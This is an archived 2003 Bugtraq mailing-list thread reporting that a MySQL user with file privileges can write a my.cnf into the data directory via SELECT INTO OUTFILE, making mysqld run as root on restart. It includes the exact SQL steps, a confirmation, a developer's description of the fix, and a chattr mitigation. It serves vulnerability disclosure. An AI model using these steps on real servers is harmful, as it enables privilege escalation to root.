linux, säkerhet

93169 2003-03-08  22:23  /27 rader/ bugsman@libero.it <bugsman@libero.it>
Importerad: 2003-03-08  22:23  av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <3895>
Ärende: MySQL user can be changed to root
------------------------------------------------------------
Hi. I tried this on my own MySQL 3.23.55 !!!  I found out that
logging as the root user, we can change mysqld to run as root instead
that i.e. mysql but this works only if there's just one my.cnf file
and it is locate in /etc...  Here's how I did it...

I logged in as root and than I did this:

mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack VALUES ('[mysqld]');
mysql>INSERT IN hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT

Doing so we have create a my.cnf in mysql datadir containing:

[mysqld]
user=root

Now, when the mysql server will be restarted, the user option in our
datadit my.cnf will override the one in /etc/my.cnf and mysql server
will run as root, with all the security flwas that it takes...  This
is very dangerous if we think that in mysql <= 3.23.53 it is really
easy to get root access due to a bug (an exploit has been released
publicly)...  I dunno how this problem can be solved, I'd like to
hear from you something...  Thanks.... :) by Gufino
(93169) /bugsman@libero.it <bugsman@libero.it>/(Ombruten)
93642 2003-03-11  17:40  /44 rader/ Sergei Golubchik <serg@mysql.com>
Importerad: 2003-03-11  17:40  av Brevbäraren
Extern mottagare: Guido A.J. Stevens <gyst@nfg.nl>
Mottagare: Bugtraq (import) <3905>
Ärende: Re: MySQL user can be changed to root
------------------------------------------------------------
Hi!

Both to bugtraq and mysql list:

This issue has been adressed in 3.23.56 (release build is started
today), and some steps were taken to alleviate the threat.

In particular, MySQL will no longer read config files that are
world-writeable (and SELECT ... OUTFILE always creates
world-writeable files). Also, unlike other options, for --user option
the first one will have the precedence. So if --user is set in
/etc/my.cnf (as it is recommended in the manual), datadir/my.cnf will
not be able to override it.

Fixing this issue in more robust way would mean introducing too big
and incompatible changes into stable version, thus breaking lots of
installations. It is to be done in 4.1.
 
Regards,
Sergei

On Mar 10, Guido A.J. Stevens wrote:
> 
> I can confirm this privilege escalation in mysql-server   3.23.49-8.2 
> (debian/stable on linux/i386). Any mysql user with file privileges can 
> trick the mysql server into running as root on restart of the mysql 
> subsystem.
> 
> bugsman@libero.it wrote:
> 
> > mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
> 
> > Now, when the mysql server will be restarted, the user option in our
> > datadir my.cnf will override the one in /etc/my.cnf and mysql server will
> > run as root

-- 
MySQL Development Team
   __  ___     ___ ____  __
  /  |/  /_ __/ __/ __ \/ /   Sergei Golubchik <serg@mysql.com>
 / /|_/ / // /\ \/ /_/ / /__  MySQL AB, http://www.mysql.com/
/_/  /_/\_, /___/\___\_\___/  Osnabrueck, Germany
       <___/
(93642) /Sergei Golubchik <serg@mysql.com>/(Ombruten)
93651 2003-03-11  18:37  /74 rader/ Christopher McCrory <chrismcc@pricegrabber.com>
Importerad: 2003-03-11  18:37  av Brevbäraren
Extern mottagare: bugtraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <3909>
Kommentar till text 93169 av bugsman@libero.it <bugsman@libero.it>
Ärende: Re: MySQL user can be changed to root
------------------------------------------------------------
Hello...



On Sat, 2003-03-08 at 03:58, bugsman@libero.it wrote:
> Hi. I tried this on my own MySQL 3.23.55 !!!
> I found out that logging as the root user, we can change mysqld to run as root instead that i.e. mysql but this works only if there's just one my.cnf file and it is locate in /etc...
> Here's how I did it...
> 
> I logged in as root and than I did this:
> 
> mysql>CREATE DATABASE roottext;
> mysql>USE roottext;
> mysql>CREATE TABLE hack (conf VARCHAR(80));
> mysql>INSERT IN hack VALUES ('[mysqld]');
> mysql>INSERT IN hack VALUES ('user=root');
> mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
> mysql>QUIT
> 
> Doing so we have create a my.cnf in mysql datadir containing:
> 
> [mysqld]
> user=root
> 
> Now, when the mysql server will be restarted, the user option in our datadit my.cnf will override the one in /etc/my.cnf and mysql server will run as root, with all the security flwas that it takes...
> This is very dangerous if we think that in mysql <= 3.23.53 it is really easy to get root access due to a bug (an exploit has been released publicly)...
> I dunno how this problem can be solved, I'd like to hear from you something...

Quick fix:

change ownership of ~mysql/my.cnf to (system) root
chattr +i

e.g.:

[Me@Here  /var/lib/mysql]$ sudo vi my.cnf
[Me@Here  /var/lib/mysql]$ cat my.cnf
# Empty

[Me@Here  /var/lib/mysql]$ sudo chattr +i my.cnf

[Me@Here  /var/lib/mysql]$ sudo -u mysql perl -pi -e "s#Empty# Mine#"
my.cnf
Can't remove my.cnf: Operation not permitted, skipping file.

[Me@Here  /var/lib/mysql]$ cat my.cnf
# Empty

[Me@Here  /var/lib/mysql]$ ls -la
total 28
drwxr-xr-x    3 mysql    mysql        4096 Mar  9 17:43 .
drwxr-xr-x   18 root     root         4096 Nov 16 18:24 ..
-rw-r--r--    1 root     root            8 Mar  9 17:42 my.cnf





> Thanks.... :)
> by
> Gufino
-- 
Christopher McCrory
 "The guy that keeps the servers running"
 
chrismcc@pricegrabber.com
 http://www.pricegrabber.com
 
Let's face it, there's no Hollow Earth, no robots, and
no 'mute rays.' And even if there were, waxed paper is
no defense.  I tried it.  Only tinfoil works.
(93651) /Christopher McCrory <chrismcc@pricegrabber.com>/